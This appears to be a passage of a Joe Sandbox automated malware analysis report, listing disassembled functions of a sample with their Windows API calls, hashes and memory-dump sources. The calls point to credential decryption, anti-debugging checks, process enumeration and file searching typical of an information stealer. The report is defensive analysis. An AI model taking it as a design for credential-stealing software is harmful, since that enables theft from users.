Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95

Function 048CCB87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 048CCBBA
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 048CCBD8
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 048CCBE3
memcpy.MSVCRT(?,?,?), ref: 048CCC79
lstrcat.KERNEL32(?,00420B47), ref: 048CCCAA
lstrcat.KERNEL32(?,00420B4B), ref: 048CCCBE
lstrcat.KERNEL32(?,00420B4E), ref: 048CCCDF

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
Instruction ID: c93860f6eb1dd788acead2334ac125074984855308d024af855e676f2133cdfa
Opcode Fuzzy Hash: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
Instruction Fuzzy Hash: 0B4153B4D04219DBDB10CF94DD89BEEBBB9BB44304F1046A9F509A7280D7746B84CF95

Function 0041B63A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BEA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
TerminateProcess.KERNEL32(00000000), ref: 0041BEE5

Strings

eM, xrefs: 0041BEBD

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: eM
API String ID: 2579439406-4107679315
Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D

Function 0040A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

Strings

>O@, xrefs: 0040A224, 0040A231, 0040A249, 0040A268, 0040A234, 0040A26B

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: >O@
API String ID: 4291131564-3498640338
Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50

Function 0492ED3D Relevance: 7.6, Strings: 6, Instructions: 123COMMON

Download Yara Rule

Strings

{, xrefs: 0492EF01
\u, xrefs: 0492EE0A
\u, xrefs: 0492EEFA
}, xrefs: 0492EE06
}, xrefs: 0492EEF6
{, xrefs: 0492EE11

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID:
String ID: \u$\u${${$}$}
API String ID: 0-582841131
Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
Instruction ID: 590399330c28825323d6c1b4aa49a85e9fd713c0f671facac9161dcd8624f6af
Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
Instruction Fuzzy Hash: 66418B22E09BD9C5CB058F7445E02AEBFB26FE6210F5D42EAC49D1F382C774514AD3A5

Function 048D7F87 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 048D7FD8
LocalAlloc.KERNEL32(00000040,?), ref: 048D7FF0
GetKeyboardLayoutList.USER32(?,00000000), ref: 048D8004
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 048D8059
LocalFree.KERNEL32(00000000), ref: 048D8119

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID:
API String ID: 3090951853-0
Opcode ID: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
Instruction ID: 174b74c9060f04c884c32ac6b8a99ba8e7ccb33287379b7e70725d38b721da38
Opcode Fuzzy Hash: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
Instruction Fuzzy Hash: F5413F71942228ABDB28EB54DC98FEDB374FB58704F2046D9E50AE2190DBB46F84CF51

Function 048DB8A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 048DC109
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 048DC11E
UnhandledExceptionFilter.KERNEL32(0041F2B0), ref: 048DC129
GetCurrentProcess.KERNEL32(C0000409), ref: 048DC145
TerminateProcess.KERNEL32(00000000), ref: 048DC14C

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction ID: c02812121e4b38f0b791d3457884242d7b2abe2db7ea8d9ab196bff2ffa9810e
Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction Fuzzy Hash: AC21BFB8902214DFDB10DF69F885A883BB4FB08314F52857BE91897261E7B1A9858F1D

Function 004072A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55

Function 048C7507 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 048C7514
RtlAllocateHeap.NTDLL(00000000), ref: 048C751B
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 048C7548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 048C756B
LocalFree.KERNEL32(?), ref: 048C7575

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction ID: 202ec8ac892eb196428b9aa673752933e5d35c01673e7f543f1a0cb66e151b42
Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction Fuzzy Hash: 16010075A45308BBEB10DFE4DC45F9D7779AB44B04F108546FB05AA2C0D670AB008B55

Function 00419790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
CloseHandle.KERNEL32(00420ACE), ref: 0041980A

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61

Function 048D99F7 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 048D9A15
Process32First.KERNEL32(00420ACE,00000128), ref: 048D9A29
Process32Next.KERNEL32(00420ACE,00000128), ref: 048D9A3E
StrCmpCA.SHLWAPI(?,00000000), ref: 048D9A53
CloseHandle.KERNEL32(00420ACE), ref: 048D9A71

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction ID: 848d5f445997064afa18f102c189869a82e50e675f621a00a612103cdcd826ec
Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction Fuzzy Hash: 49011EB6A05208EBCB20DFA4CD84BDDB7B9BB08700F004689E509D7240EB70AB80CF51

Function 00413970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00

Strings

,<A, xrefs: 0041398D, 00413AE4, 00413AE7

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: ,<A
API String ID: 123533781-3158208111
Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50

Function 048CE797 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215E8,00420D79), ref: 048CE809
StrCmpCA.SHLWAPI(?,004215F0), ref: 048CE859
StrCmpCA.SHLWAPI(?,004215F4), ref: 048CE86F
FindNextFileA.KERNEL32(000000FF,?), ref: 048CEF46

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID:
API String ID: 433455689-0
Opcode ID: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
Instruction ID: 23007cbc85e1cced6fbd3e3eb43ec1833df6f1de1aa481a212b5fdeeba28b96c
Opcode Fuzzy Hash: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
Instruction Fuzzy Hash: 1012FE719022189AEB1CFB64DC94EED7335AB54208F604AED954BE6090EFF47B48CF52

Function 00419030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9

Function 048D9297 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,048C543B,40000001,00000000,00000000,?,048C543B), ref: 048D92B7

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction ID: c9c5a97e72cb61f9e9a60d1958e65d49b7f9df522d5158de70cfa858e1de4cc2
Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction Fuzzy Hash: 0B111FB0605208BFDB04CF54D844FAB33B9AF89714F00AA54F919CB250D771F941DB60

Function 048CA477 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048C51A5,00000000,00000000), ref: 048CA4A6
LocalAlloc.KERNEL32(00000040,?,?,?,048C51A5,00000000,?), ref: 048CA4B8
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048C51A5,00000000,00000000), ref: 048CA4E1
LocalFree.KERNEL32(?,?,?,?,048C51A5,00000000,?), ref: 048CA4F6

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction ID: 8eaea2c3e7bb307efb21ef8c9f327d6442d3def6a3f7ba1e0413e37165b6b6f5
Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction Fuzzy Hash: 2411C074641208EFEB14CFA4DC95FAA77B6EB88704F208549FD159B290C7B2EA40CB50

Function 0040A2B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
memcpy.MSVCRT(?,?,?), ref: 0040A316
LocalFree.KERNEL32(?), ref: 0040A323

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61

Function 048CA517 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 048CA53B
LocalAlloc.KERNEL32(00000040,00000000), ref: 048CA55A
memcpy.MSVCRT(?,?,?), ref: 048CA57D
LocalFree.KERNEL32(?), ref: 048CA58A

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction ID: 5aa6461187c8053b8b013828d5eda81ca52f210ea18e7684bcf75d9dcb71eb83
Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction Fuzzy Hash: FD118AB8A01209EFCB04DFA4D985AAEB7B5FF89300F108559FD1597390D770AA50CFA1

Function 048C092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 048C095F
GetProcAddress., xrefs: 048C09DC, 048C09DF, 048C09E4
l, xrefs: 048C0966

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 234526f98062d9d445f44a7804ddb95bc18d62171869177ca6b95dc8f827117e
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 603158B6900609CFEB11CF99C880BAEBBF9FF09368F14454AD541E7210D7B1EA45CBA4

Function 00418CF0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
